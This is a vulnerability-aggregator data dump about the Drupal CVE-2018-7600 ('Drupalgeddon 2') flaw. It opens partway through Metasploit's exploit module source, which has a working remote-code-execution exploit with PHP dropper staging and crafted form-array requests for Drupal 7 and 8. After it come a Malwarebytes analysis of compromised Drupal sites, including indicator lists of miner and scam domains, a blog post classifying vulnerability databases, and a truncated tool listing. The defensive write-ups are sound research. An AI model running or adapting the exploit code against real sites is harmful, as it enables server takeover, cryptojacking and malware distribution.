=> ARCH_PHP,\n 'Version' => Gem::Version.new('8'),\n 'Type' => :php_dropper\n ],\n ['Drupal 8.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Gem::Version.new('8'),\n 'Type' => :unix_memory\n ],\n ['Drupal 8.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Gem::Version.new('8'),\n 'Type' => :linux_dropper\n ]\n ],\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\n 'DefaultOptions' => {'WfsDelay' => 2}, # Also seconds between attempts\n 'Notes' => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}\n ))\n\n register_options([\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\n OptBool.new('DUMP_OUTPUT', [false, 'Dump payload command output', false])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\n ])\n end\n\n def check\n checkcode = CheckCode::Unknown\n\n @version = target['Version'] || drupal_version\n\n unless @version\n vprint_error('Could not determine Drupal version to target')\n return checkcode\n end\n\n vprint_status(\"Drupal #{@version} targeted at #{full_uri}\")\n checkcode = CheckCode::Detected\n\n changelog = drupal_changelog(@version)\n\n unless changelog\n vprint_error('Could not determine Drupal patch level')\n return checkcode\n end\n\n case drupal_patch(changelog, 'SA-CORE-2018-002')\n when nil\n vprint_warning('CHANGELOG.txt no longer contains patch level')\n when true\n vprint_warning('Drupal appears patched in CHANGELOG.txt')\n checkcode = CheckCode::Safe\n when false\n vprint_good('Drupal appears unpatched in CHANGELOG.txt')\n checkcode = CheckCode::Appears\n end\n\n # NOTE: Exploiting the vuln will move us from \"Safe\" to Vulnerable\n token = rand_str\n res = execute_command(token, func: 'printf')\n\n return checkcode unless res\n\n if res.body.start_with?(token)\n vprint_good('Drupal is vulnerable to code execution')\n checkcode = CheckCode::Vulnerable\n end\n\n checkcode\n end\n\n def exploit\n if check == CheckCode::Safe && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n unless @version\n print_warning('Targeting Drupal 7.x as a fallback')\n @version = Gem::Version.new('7')\n end\n\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\n # XXX: Naughty datastore modification\n datastore['DUMP_OUTPUT'] = true\n end\n\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\n case target['Type']\n when :php_memory\n execute_command(payload.encoded, func: 'assert')\n\n sleep(wfs_delay)\n return if session_created?\n\n # XXX: This will spawn a *very* obvious process\n execute_command(\"php -r '#{payload.encoded}'\")\n when :unix_memory\n execute_command(payload.encoded)\n when :php_dropper, :linux_dropper\n dropper_assert\n\n sleep(wfs_delay)\n return if session_created?\n\n dropper_exec\n end\n end\n\n def dropper_assert\n php_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{rand_str}.php\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # Stage 1 decodes the PHP and writes it to disk\n stage1 = %Q{\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\n }\n\n # Stage 2 executes said PHP in-process\n stage2 = %Q{\n include_once(\"#{php_file}\");\n }\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Hopefully pop our shell with assert()\n execute_command(stage1.strip, func: 'assert')\n execute_command(stage2.strip, func: 'assert')\n end\n\n def dropper_exec\n php_file = \"#{rand_str}.php\"\n tmp_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{php_file}\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Write the payload or dropper to disk (!)\n # NOTE: Analysis indicates > is a badchar for 8.x\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\n\n # Attempt in-process execution of our PHP script\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, php_file)\n )\n\n sleep(wfs_delay)\n return if session_created?\n\n # Try to get a shell with PHP CLI\n execute_command(\"php #{php_file}\")\n\n sleep(wfs_delay)\n return if session_created?\n\n register_file_for_cleanup(tmp_file)\n\n # Fall back on our temp file\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\n execute_command(\"php #{tmp_file}\")\n end\n\n def execute_command(cmd, opts = {})\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\n\n vprint_status(\"Executing with #{func}(): #{cmd}\")\n\n res =\n case @version.to_s\n when /^7\\b/\n exploit_drupal7(func, cmd)\n when /^8\\b/\n exploit_drupal8(func, cmd)\n end\n\n return unless res\n\n if res.code == 200\n print_line(res.body) if datastore['DUMP_OUTPUT']\n else\n print_error(\"Unexpected reply: #{res.inspect}\")\n end\n\n res\n end\n\n def exploit_drupal7(func, code)\n vars_get = {\n 'q' => 'user/password',\n 'name[#post_render][]' => func,\n 'name[#markup]' => code,\n 'name[#type]' => 'markup'\n }\n\n vars_post = {\n 'form_id' => 'user_pass',\n '_triggering_element_name' => 'name'\n }\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n\n return res unless res && res.code == 200\n\n form_build_id = res.get_html_document.at(\n '//input[@name = \"form_build_id\"]/@value'\n )\n\n return res unless form_build_id\n\n vars_get = {\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\n }\n\n vars_post = {\n 'form_build_id' => form_build_id.value\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def exploit_drupal8(func, code)\n # Clean URLs are enabled by default and \"can't\" be disabled\n uri = normalize_uri(target_uri.path, 'user/register')\n\n vars_get = {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => 1,\n '_wrapper_format' => 'drupal_ajax'\n }\n\n vars_post = {\n 'form_id' => 'user_register_form',\n '_drupal_ajax' => 1,\n 'mail[#type]' => 'markup',\n 'mail[#post_render][]' => func,\n 'mail[#markup]' => code\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def rand_str\n Rex::Text.rand_text_alphanumeric(8..42)\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/drupal_drupalgeddon2.rb"}], "malwarebytes": [{"lastseen": "2018-06-05T16:04:05", "bulletinFamily": "blog", "description": "Drupal is one of the most popular Content Management Systems (CMS), along with WordPress and Joomla. In late March 2018, Drupal was affected by a major remote code execution vulnerability ([CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)) followed by yet another ([CVE-2018-7602](<https://www.drupal.org/sa-core-2018-004>)) almost a month later, both aptly nicknamed Drupalgeddon 2 and Drupalgeddon 3.\n\nThese back-to-back vulnerabilities were accompanied by proof of concepts that translated into almost immediate real-world attacks. For many website owners, this situation was frustrating because the window of time to patch is getting considerably smaller. Additionally, updating or upgrading Drupal (or any other CMS for that matter) may have side effects, such as broken templates or functionality, which is why you need to make a full back up and test the changes in the staging environment before moving to production.\n\nRolling out a CMS is usually the easy part. Maintaining it is where most problems occur due to lack of knowledge, fear of breaking something, and, of course, costs. While this is an earned responsibility for each site owner to do due diligence with their web properties, the outcome is typically websites being severely out of date and exploited, often more than once.\n\n### Sample set and web crawl\n\nWe decided to choose a number web properties that had not yet been validated (including all versions of Drupal, vulnerable or not). Our main source of URLs came from [Shodan](<https://www.shodan.io/>) and was complemented by [PublicWWW](<https://publicwww.com/>), for a total of roughly 80,000 URLs to crawl. We were surprised to start hitting compromised sites quickly into the process and were able to confirm around [900 injected web properties](<https://pastebin.com/GCWiSpa3>).\n\nMany of the results were servers hosted on Amazon or other cloud providers that were most likely set up for testing purposes (staging) and never removed or upgraded. Thankfully, they received little to no traffic. The other domains we encountered spanned a variety of verticals and languages, with one common denominator: an outdated version (usually severely outdated) of the Drupal CMS.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/Crawl.png> \"\" )\n\n_Figure 1: Crawling and flagging compromised Drupal sites using Fiddler_\n\n### Drupal versions\n\nAt the time of this writing, there are two [recommended releases](<https://www.drupal.org/project/drupal>) for Drupal. Version 8.x.x is the latest and greatest with some new features, while 7.x.x is considered the most stable and compatible version, especially when it comes to themes.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/releases_.png> \"\" )\n\n_Figure 2: Drupal's two main supported branches_\n\nAlmost half the sites we flagged as compromised were running Drupal version 7.5.x, while version 7.3.x still represented about 30 percent, a fairly high number considering it was last updated in [August 2015](<https://www.drupal.org/project/drupal/releases/7.39>). Many security flaws have been discovered (and exploited) since then.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats1.png> \"\" )\n\n_Figure 3: Percentage of compromised sites belonging to a particular Drupal version_\n\n### Payloads\n\nA large number of Drupal sites that have been hacked via these two recent exploits were also infected with server-side malware, in particular with [XMRig cryptocurrency miners](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>). However, in this post we will focus on the client-side effects of those compromises. Neither are exclusive though, and one should expect that a hacked site could be performing malicious actions on both server and client side.\n\nUnsurprisingly, web miners were by far the most common type of injection we noticed. But we also came across a few different social engineering campaigns.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/stats2.png> \"\" )\n\n_Figure 4: Breakdown of the most common payloads_\n\n#### Web miners\n\n[Drive-by mining attacks](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) went though the roof in the fall of 2017 but slowed down somewhat at the beginning of the year. It's safe to say that the recent Drupal vulnerabilities have added fuel to the fire and resulted in increased activity. Coinhive injections remain by far the most popular choice, although public or private Monero pools are gaining traction as well.\n\nWe are seeing the same campaign that was [already documented](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>) by other researchers in early March and is ensnaring more victims by the day.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/coinhive_uni.png> \"\" )\n\n_Figure 5: A subdomain of Harvard University's main site mining Monero_\n\n#### Fake updates\n\nThis campaign of fake browser updates we [documented earlier](<https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/>) is still going strong. It distributes a password stealer of Remote Administration Tool (RAT).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/FakeUpdates.png> \"\" )\n\n_Figure 6: A compromised Drupal site pushing a fake Chrome update_\n\n#### Tech support scams (browlocks)\n\nRedirections to browser locker pages\u2014a typical approach for unveiling tech support scams. The most common redirection we were able to document involved an intermediary site redirecting to browser locker pages using the .TK Top Level Domain (TLD) name.\n \n \n mysimplename[.]com/si.php\n window.location.replace(\"http://hispaintinghad[.]tk/index/?1641501770611\");\n window.location.href = \"http://hispaintinghad[.]tk/index/?1641501770611\";\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/TSS_redirection.png> \"\" )\n\n_Figure 7: A compromised Drupal host redirecting to a browser locker page_\n\n### Web miners and injected code\n\nWe collected different types of code injection, from simple and clear text to long obfuscated blurbs. It\u2019s worth noting that in many cases the code is dynamic\u2014most likely a technique to evade detection.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/miner_injections.png> \"\" )\n\n_Figure 8: Collage of some of the most common miner injections_\n\n### Snapshots\n\nThe following are some examples of compromised sites sorted by category. We have contacted all affected parties to let them know their resources are being used by criminals to generate profit from malicious cryptomining or malware infections.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/uni1.png> \"\" )\n\n_Figure 9: Education (University of Southern California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/gov1.png> \"\" )\n\n_Figure 10: Government (Arkansas Courts & Community Initiative)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/political.png> \"\" )\n\n_Figure 11: Political party (Green Party of California)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/reviveadserver.png> \"\" )\n\n_Figure 12: Ad server (Indian TV Revive Ad server)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/religious.png> \"\" )\n\n_Figure 13: Religion (New Holly Light)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/health_.png> \"\" )\n\n_Figure 14: Health (NetApp Benefits)_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/conf.png> \"\" )\n\n_Figure 15: Conferences (Red Hat partner conference) _\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/tech.png> \"\" )\n\n_Figure 16: Tech (ComputerWorld's Brazilian portal)_\n\n### Malicious cryptomining remains hot\n\nIt is clear that right now, cryptomining is the preferred kind of malicious injection. There are many public but also private APIs that make the whole process easy, and unfortunately they are being abused by bad actors.\n\nCompromised sites big and small remain a hot commodity that attackers will try to amass over time. And because patching remains an issue, the number of potential new victims never stops growing. In light of this, website owners should look into other kinds of mitigation when patching is not always an immediate option, and check what some people call virtual patching. In particular, Web Application Firewalls (WAFs) have helped many stay protected even against new types of attacks, and even when their CMS was vulnerable.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) continues to detect and block malicious cryptomining and other unwanted redirections.\n\n### Indicators of compromise\n\n**Coinhive**\n\n-> URIs\n \n \n cnhv[.]co/1nt9z\n coinhive[.]com/lib/coinhive.min.js\n coinhive[.]com/lib/cryptonight.wasm\n coinhive[.]com/lib/worker-asmjs.min.js?v7\n ws[0-9]{3}.coinhive[.]com/proxy\n\n-> Site keys\n \n \n CmGKP05v2VJbvj33wzTIayOv6YGLkUYN\n f0y6O5ddrXo1be4NGZubP1yHDaWqyflD\n kAdhxvdilslXbzLAEjFQDAZotIVm5Jkf\n MKr3Uf5CaT88pcqzAXltkBu4Us5gHWaj\n NL9TTsyGeVU8FbKR9fUvwkwU4qPJ4Z2I\n no2z8X4wsiouyTmA9xZ0TyUdegWBw2yK\n oHaQn8uDJ16fNhcTU7y832cv49PqEvOS\n PbNDLKIHLCM0hNXOIM7sRTsk66ZuAamf\n RYeWLxbPVlfPNsZUh231aLXoYAdPguXY\n XoWXAWvizTNnyia78qTIFfATRgcbJfGx\n YaUkuGZ3pmuPVsBMDxSgY45DwuBafGA3\n\n**Crypto-Loot**\n\n-> URI\n \n \n cryptaloot[.]pro/lib/justdoit2.js\n\n-> Keys\n \n \n 48427c995ba46a78b237c5f53e5fef90cd09b5f09e92\n 6508a11b897365897580ba68f93a5583cc3a15637212\n d1ba2c966c5f54d0da15e2d881b474a5091a91f7c702\n\n**EthPocket**\n \n \n eth-pocket[.]com:8585\n eth-pocket[.]de/perfekt/perfekt.js\n\n**JSECoin**\n \n \n jsecoin[.]com/platform/banner1.html?aff1564&utm_content=\n\n**DeepMiner**\n \n \n greenindex.dynamic-dns[.]net/jqueryeasyui.js\n\n**Other CryptoNight-based miner**\n \n \n cloudflane[.]com/lib/cryptonight.wasm\n\n**FakeUpdates**\n \n \n track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba\n click.clickanalytics208[.]com/s_code.js?cid=240&v=73a55f6de3dee2a751c3\n 185.244.149[.]74\n 5.9.242[.]74\n\n**Tech scams**\n \n \n 192.34.61[.]245\n 192.81.216[.]165\n 193.201.224[.]233\n 198.211.107[.]153\n 198.211.113[.]147\n 206.189.236[.]91\n 208.68.37[.]2\n addressedina[.]tk\n andtakinghis[.]tk\n andweepover[.]tk\n asheleaned[.]tk\n baserwq[.]tk\n blackivory[.]tk\n blownagainst[.]tk\n cutoplaswe[.]tk\n dearfytr[.]tk\n doanythingthat[.]tk\n faithlessflorizel[.]tk\n grey-plumaged[.]tk\n haddoneso[.]tk\n handkerchiefout[.]tk\n himinspectral[.]tk\n hispaintinghad[.]tk\n ifheisdead[.]tk\n itshandupon[.]tk\n iwouldsay[.]tk\n leadedpanes[.]tk\n millpond[.]tk\n mineofcourse[.]tk\n momentin[.]tk\n murdercould[.]tk\n mysimplename[.]com\n nearlythrew[.]tk\n nothinglikeit[.]tk\n oncecommitted[.]tk\n portraithedid[.]tk\n posingfor[.]tk\n secretsoflife[.]tk\n sendthemany[.]tk\n sputteredbeside[.]tk\n steppedforward[.]tk\n sweeppast[.]tk\n tellingmeyears[.]tk\n terriblehope[.]tk\n thatwonderful[.]tk\n theattractions[.]tk\n thereisnodisgrace[.]tk\n togetawayt[.]tk\n toseethem[.]tk\n wickedwere[.]tk\n withaforebodingu[.]tk\n\nThe post [A look into Drupalgeddon's client-side attacks](<https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-05-18T15:00:00", "published": "2018-05-18T15:00:00", "id": "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "href": "https://blog.malwarebytes.com/threat-analysis/2018/05/look-drupalgeddon-client-side-attacks/", "type": "malwarebytes", "title": "A look into Drupalgeddon\u2019s client-side attacks", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "avleonov": [{"lastseen": "2018-08-03T12:56:42", "bulletinFamily": "blog", "description": "What publicly available Vulnerability Databases do we have? Well, I can only say that there are a lot of them and they are pretty different. Here I make an attempt to classify them.\n\nIt's quite an ungrateful task. No matter how hard you try, the final result will be rather inaccurate and incomplete. I am sure someone will be complaining. But this is how I see it.  If you want to add or change something feel free to make a comment bellow or email [me@avleonov.com](<mailto:me@avleonov.com>).\n\nThe main classifier, which I came up with:\n\n * There are individual vulnerability databases in which one identifier means one vulnerability. They try to cover all existing vulnerabilities.\n * And others are security bulletins. They cover vulnerabilities in a particular product or products. And they usually based on on patches. One patch may cover multiple vulnerabilities.\n\nI made this diagram with some Vulnerability Databases. Note that I wanted to stay focused, so there are no exploit DBs, CERTs, lists of vulnerabilities detected by some researchers ([CISCO Talos](<https://www.talosintelligence.com/vulnerability_info>), [PT Research](<https://www.ptsecurity.com/ww-en/analytics/threatscape/>), etc.), Media and Bug Bounty sites.\n\n\n\nFor these databases the descriptions of vulnerabilities are publicly available on the site (in html interface or downloadable data feed), or exist in a form of paid Vulnerability Intelligence service (for example, [Flexera](<https://www.flexera.com/products/software-vulnerability-management/software-vulnerability-manager.html>)).\n\nOn one side there are databases of individual vulnerabilities, the most important is [National Vulnerability Database](<https://nvd.nist.gov/>). There are also Chinese, Japanese bases that can be derived from NVD or not.\n\nOn the other side we have security bulletins, for example [RedHat Security Advisories](<https://www.redhat.com/archives/rhsa-announce/>).\n\nAnd in the middle we have a Vulnerability Databases, for which it is not critical whether they have duplicated vulnerability IDs or not.\n\nThese are the Vulnerability Databases of aggregators, vulnerability scanners, security content databases. We can say that [CIS OVAL](<https://oval.cisecurity.org/>) or [OpenVAS NVTs](<http://www.openvas.org/openvas-nvt-feed.html>) are the forms of public security content. Russian [FSTEC BDU Vulnerability Database](<https://bdu.fstec.ru/vul>) also has individual vulnerabilities and security bulletins.\n\n### Classification\n\nI have the following groups:\n\n 1. Individual Vulnerabilities\n 2. Individual Vulnerabilities -> Government\n 3. Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators\n 4. Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators\n 5. Mixed Individual Vulnerabilities and Security Bulletins -> Government\n 6. Mixed Individual Vulnerabilities and Security Bulletins -> Open and formalized detection rules\n 7. Security Bulletins\n 8. Security Bulletins -> All software in repository\n\n### Registry\n\nI was trying to give a link on the same [\"Drupalgedon2\" CVE-2018-7600](<https://github.com/jirojo2/drupalgeddon2>) vulnerability in examples, where it was possible. I mentioned the ways to grab all the entries from particular Vulnerability Database in the Aggregation column. Most of this methods are provided by the owner of the Database (\"official\") or in a form of [Vulners collections](<https://avleonov.com/2016/10/24/processing-vulners-collections-using-python/>).\n\nName | Classification Group | Description | Example of content | Aggregation \n---|---|---|---|--- \n[Mitre CVE](<https://cve.mitre.org/>) | Individual Vulnerabilities | Coordinate the release of CVE identifiers | [CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>) | [Official](<https://cve.mitre.org/data/downloads/index.html>) \n[IBM X force](<https://exchange.xforce.ibmcloud.com/>) | Individual Vulnerabilities | Threat and Vulnerability Intelligence service | [CVE-2018-7600](<https://exchange.xforce.ibmcloud.com/vulnerabilities/140913>) | n/a \n[NIST NVD](<https://nvd.nist.gov/>) | Individual Vulnerabilities -> Government | The NVD is the U.S. government repository of standards based vulnerability management data | [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) | [Official](<https://nvd.nist.gov/vuln/data-feeds>), [Vulners](<https://vulners.com/stats>) \n[CNNVD](<http://www.cnnvd.org.cn/>) | Individual Vulnerabilities -> Government | China National Vulnerability Database of Information Security | [CNNVD-201803-1136](<http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201803-1136>) | [Official](<http://www.cnnvd.org.cn/web/xxk/xmlDown.tag>) \n[CNVD](<http://www.cnvd.org.cn/>) | Individual Vulnerabilities -> Government | China National Vulnerability Database | [CNTA-2018-0012](<http://www.cnvd.org.cn/webinfo/show/4463>) | n/a \n[JVN](<https://jvn.jp>) | Mixed Individual Vulnerabilities and Security Bulletins -> Government | Japan Vulnerability Notes | [JVN#65268217](<https://jvn.jp/jp/JVN65268217/index.html>) | n/a \n[BDU Fstec](<https://bdu.fstec.ru/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Government | Russian Data Security Threats Database | [BDU:2018-00749](<https://bdu.fstec.ru/vul/2018-00749>) | [Official](<https://bdu.fstec.ru/vul>) \n[Risk Based Security VulnDB](<https://vulndb.cyberriskanalytics.com/>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | Vulnerability Intelligence vendor | n/a | n/a \n[Flexera](<https://www.flexera.com/products/software-vulnerability-management/software-vulnerability-manager.html>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | Vulnerability Intelligence vendor | n/a | n/a \n[Beyond Security SecuriTeam](<http://www.securiteam.com/>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | Vulnerability Management vendor | [CVE-2016-9939](<http://www.securiteam.com/securitynews/5LP3G20MKY.html>) | n/a \n[VulDB](<https://vuldb.com/>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | \"Number 1 vulnerability database worldwide with more than 117000 entries available.\" | [CVE-2018-7600](<https://vuldb.com/?id.115197>) | n/a \n[vFeed](<https://vfeed.io/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Trusted Vulnerability & Threat Intelligence Database\" | n/a | [Official](<https://vfeed.io/pricing/>) \n[Vulners](<https://vulners.com/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Complete Vulnerability DataBase & Security Scanne\" | [CVE-2018-7600](<https://vulners.com/cve/CVE-2018-7600>) | [Official](<https://vulners.com/cve/stats>) \n[Tenable](<https://www.tenable.com/plugins>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | Tenable Nessus Attack Scripting Language (NASL) plugins | [CVE-2018-7600](<https://www.tenable.com/plugins/nessus/109041>) | [Vulners](<https://vulners.com/stats>) \n[Snyk](<https://snyk.io/vuln/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Snyk helps you use open source and stay secure.\" | [CVE-2018-7600](<https://snyk.io/vuln/SNYK-PHP-DRUPALCORE-72112>) | n/a \n[Rapid7](<https://www.rapid7.com/db>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Vulnerability & Exploit Database\" | [CVE-2018-7600](<https://www.rapid7.com/db/vulnerabilities/drupal-cve-2018-7600>) | n/a \n[Altx-Soft OVAL Repository](<https://ovaldb.altx-soft.ru/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | ALTEX-SOFT-owned OVAL repository | [CVE-2018-7600](<https://ovaldb.altx-soft.ru/Definition.aspx?id=oval:com.altx-soft.nix:def:19053>) | n/a \n[SecPod SCAP Repo](<https://www.scaprepo.com/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | SecPod-owned OVAL repository | [CVE-2018-7600](<https://www.scaprepo.com/control.jsp?command=relation&relationId=oval:org.secpod.oval:def:603336>) | n/a \n[OpenVAS NVT](<http://www.openvas.org/openvas-nvt-feed.html>) | Mixed Individual Vulnerabilities and Security Bulletins -> Open and formalized detection rules | \"Public feed of Network Vulnerability Tests (NVTs) for the OpenVAS project\" | n/a | [Vulners](<https://vulners.com/stats>) \n[CIS OVAL](<https://oval.cisecurity.org/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Open and formalized detection rules | Main database of OVAL content sponsored by Center for Internet Security | n/a | [Official](<https://oval.cisecurity.org/repository/download>) \n[CentOS CESA](<https://lists.centos.org/pipermail/centos-announce/>) | Security Bulletins -> All software in repository | The CentOS-announce Archives | [CESA-2014:0376](<https://lists.centos.org/pipermail/centos-announce/2014-April/020249.html>) | [Vulners](<https://vulners.com/stats>) \n[Ubuntu USN](<https://usn.ubuntu.com/>) | Security Bulletins -> All software in repository | Ubuntu security notices | [USN-2165-1](<https://usn.ubuntu.com/2165-1/>) | [Vulners](<https://vulners.com/stats>) \n[RedHat RHSA](<https://www.redhat.com/archives/rhsa-announce/>) | Security Bulletins -> All software in repository | The RedHat-announce Archives | [RHSA-2014:0376](<https://access.redhat.com/errata/RHSA-2014:0376>) | [Vulners](<https://vulners.com/stats>) \n[Debian DSA](<https://www.debian.org/security/>) | Security Bulletins -> All software in repository | Debian Security Advisories | [DSA-4156-1](<https://www.debian.org/security/2018/dsa-4156>) | [Vulners](<https://vulners.com/stats>) \nMicrosoft KB | Security Bulletins | Microsoft Knowledge Base | [KB4013389](<https://support.microsoft.com/kb/4013389>) | n/a \n[Microsoft MS](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/securitybulletins>) | Security Bulletins | Microsoft Security Bulletin | [MS17-10](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>) | n/a \n[CISCO SA](<https://tools.cisco.com/security/center/mpublicationListingDetails.x?docType=CiscoSecurityAdvisory>) | Security Bulletins | Cisco Security Advisories | [cisco-sa-20180521](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180521-cpusidechannel>) | [Vulners](<https://vulners.com/stats>) \n[OpenSSL Vulnerabilities](<https://www.openssl.org/news/vulnerabilities.html>) | Security Bulletins | OpenSSL Vulnerabilities | [CVE-2018-0737](<https://www.openssl.org/news/secadv/20180416.txt>) | [Vulners](<https://vulners.com/stats>) \n[Apache](<https://httpd.apache.org/security_report.html>) | Security Bulletins | Security Problems with the Apache HTTP Server | [CVE-2017-9798](<https://httpd.apache.org/security/vulnerabilities_22.html>) | [Vulners](<https://vulners.com/stats>) \n[Mozilla MFSA](<https://www.mozilla.org/en-US/security/advisories/>) | Security Bulletins | Mozilla Foundation Security Advisories | [mfsa2018-13](<https://www.mozilla.org/en-US/security/advisories/mfsa2018-13/>) | [Vulners](<https://vulners.com/stats>) \n \n### Other Vulnerability Databases\n\nOf course this table is far from being complete. It's a basic structure, just to give an overall picture.\n\nYou can find more:\n\n * Different Vulnerability Databases in [Vulnerability Database Catalog by FIRST.org](<https://www.first.org/global/sigs/vrdx/vdb-catalog>).\n * Security Bulletins for different Operating Systems and Software at [Vulners.com stats page](<https://vulners.com/stats>) (blocks \"Unix\" and \"Software\").\n * Bases of OVAL content listed at [MITRE OVAL Product List](<https://oval.mitre.org/adoption/productlist.html>) (it is in archive state; see the type \"Definition Repository\")\n\nDo you know any other interesting sources about known software vulnerabilities? Feel free to mention them in the comments bellow.\n\n", "modified": "2018-06-05T15:57:41", "published": "2018-06-05T15:57:41", "id": "AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "href": "http://feedproxy.google.com/~r/avleonov/~3/o1m4yya8LXc/", "type": "avleonov", "title": "Vulnerability Databases: Classification and Registry", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kitploit": [{"lastseen": "2019-10-18T14:33:29", "bulletinFamily": "tools", "description": "[  ](<https://2.bp.blogspot.com/-WrSl3k8acz8/XKK-mOdvWPI/AAAAAAAAOaA/AhYa9ilCzBkxcfAhNbVH3l5YsgRSvL6tgCLcBGAs/s1600/Darksplitz.png>)\n\n \nThis tools is continued from Nefix, DirsPy and Xmasspy project. \n \n** Installation ** \nWill work fine in the [ debian ](<https://www.kitploit.com/search/label/Debian> \"debian\" ) shade operating system, like Backbox, 